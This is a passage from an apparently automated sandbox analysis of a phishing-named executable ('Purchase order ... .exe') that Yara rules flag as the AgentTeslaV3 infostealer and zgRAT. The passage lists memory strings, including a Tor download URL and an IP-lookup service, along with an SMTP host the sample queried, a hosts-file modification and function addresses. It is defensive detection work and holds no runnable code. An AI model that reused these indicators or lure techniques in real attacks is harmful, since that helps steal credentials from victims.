00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245457597.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245996490.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246121234.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245979867.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246836550.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246204069.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246070856.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245007021.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244404121.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247306277.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245690255.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247535138.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246152019.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247977281.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.244820676.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246915519.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245783482.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.247726544.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246035883.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.245665208.0000000005E7B000.00000004.00000800.00020000.00000000.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000003.246265302.0000000005E7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comt
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.291113070.00000000070F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%appdata
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: smtp.transmase.com

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Purchase order 450080088 proj. Allt Charnan.exe
                    .NET source code contains very large array initializations
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.csLarge array initialization: .cctor: array initializer size 11617
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b54531E20u002d7AC7u002d4E3Fu002dA3D6u002d2F253551ED56u007d/ED5B17C0u002dA6D7u002d428Du002d887Eu002dAAFCECD5D615.csLarge array initialization: .cctor: array initializer size 11617
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3c2afb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3d94e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 29.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3f6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3caafb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.3faafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.2.jVULYR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.419f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3e1f2b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3c6f990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.jVULYR.exe.3c2afb0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 25.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3caafb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 29.0.jVULYR.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e14e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 29.0.jVULYR.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 20.2.jVULYR.exe.3e9f2b0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.4114e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.jVULYR.exe.3bef990.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D443580_2_02D44358
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D4BC200_2_02D4BC20
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D443480_2_02D44348
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D440B80_2_02D440B8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D440A90_2_02D440A9
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AAB3380_2_07AAB338
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA2C3F0_2_07AA2C3F
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA19000_2_07AA1900
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA19100_2_07AA1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FCF0809_2_00FCF080
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FCF3C89_2_00FCF3C8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FC61209_2_00FC6120
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFCCF89_2_05BFCCF8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFBF989_2_05BFBF98
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF9AE09_2_05BF9AE0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF1FF89_2_05BF1FF8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BFB1C29_2_05BFB1C2
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_05BF00409_2_05BF0040
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B9F889_2_064B9F88
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B85209_2_064B8520
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B33309_2_064B3330
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_0127435820_2_01274358
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_0127BC2020_2_0127BC20
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012740A920_2_012740A9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012740B820_2_012740B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_0127434820_2_01274348
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD9E4020_2_08CD9E40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD15F720_2_08CD15F7
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD02C820_2_08CD02C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD02B820_2_08CD02B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A435823_2_011A4358
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011ABC2023_2_011ABC20
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A40B823_2_011A40B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A40A923_2_011A40A9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A434823_2_011A4348
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D59E4023_2_08D59E40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D502C823_2_08D502C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D502B823_2_08D502B8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D515F723_2_08D515F7
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0F38025_2_02C0F380
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0F6C825_2_02C0F6C8
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0656025_2_02C06560
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_02C0CBE425_2_02C0CBE4
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579212025_2_05792120
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579F86B25_2_0579F86B
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579004025_2_05790040
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579C82025_2_0579C820
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579BAD025_2_0579BAD0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06348B7725_2_06348B77
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634DB4025_2_0634DB40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06342FC025_2_06342FC0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634586D25_2_0634586D
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06342E7025_2_06342E70
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06340A4025_2_06340A40
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06343FB025_2_06343FB0
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0634B15825_2_0634B158
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: String function: 05BF5A68 appears 54 times
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.289167000.0000000003F6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000000.239580570.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.293254846.0000000007A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Purchase order 450080088 proj. Allt Charnan.exe
